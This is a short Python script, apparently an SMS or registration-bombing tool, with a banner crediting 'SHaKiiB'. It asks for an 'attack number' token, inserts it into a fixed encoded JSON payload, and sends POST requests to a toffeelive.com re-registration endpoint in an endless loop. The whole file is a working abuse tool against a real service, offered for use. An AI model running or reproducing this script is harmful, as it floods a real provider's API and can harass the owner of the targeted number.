import requests
from requests.structures import CaseInsensitiveDict


# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("	 -!-!- WeLcOmE-!-!- ( HD-SHaKiiB ) ( GhOsToFKiinG ) ")


print ("""


   ╔═════════════════════════════════╗
   ║ AuTHor   : SHaKiiB ツ           ║
   ║ FaCeBooK : iTzSHaKiiB           ║
   ║ GitHuB   : iTzSHaKiB            ║
   ╚═════════════════════════════════╝




""")

token  = str(input("[>] Heii Mr : SHaKiiB Sir. apNar aTTack NumBer ar ToKen DiN: "))

url = "https://toffeelive.com/1651139376917.html"

headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/json"

data = '{"data":"NNnMw14fLZLmCFo4gvYHKHX/fXzBDrqTjSvyGeFAqm7fTkP8miyPTneItiqMTnpm'+token+'0f1ixjt0UX12WISKvfuRMDMUIe9BDtm+5kxrmppLA+sDWaKYLIDFKNopybA7UyKhsS2buHpkXnQtwNwYIdKBLPnE4DyT6ChKiDxboj2AfuPbD0Mydqk8awGPMDX0D+xmfkgv0EvOAI8AHEUMNzFx8C5KcbbznwYh/vvmAuIxJ9Am1KBE8CB8YPZ5WtzMfCgQ==","isCheck":true,"checkPath":"re-registration-v2","buildVersion":null}'


while True:
    print(requests.post(url, headers=headers, data=data).text)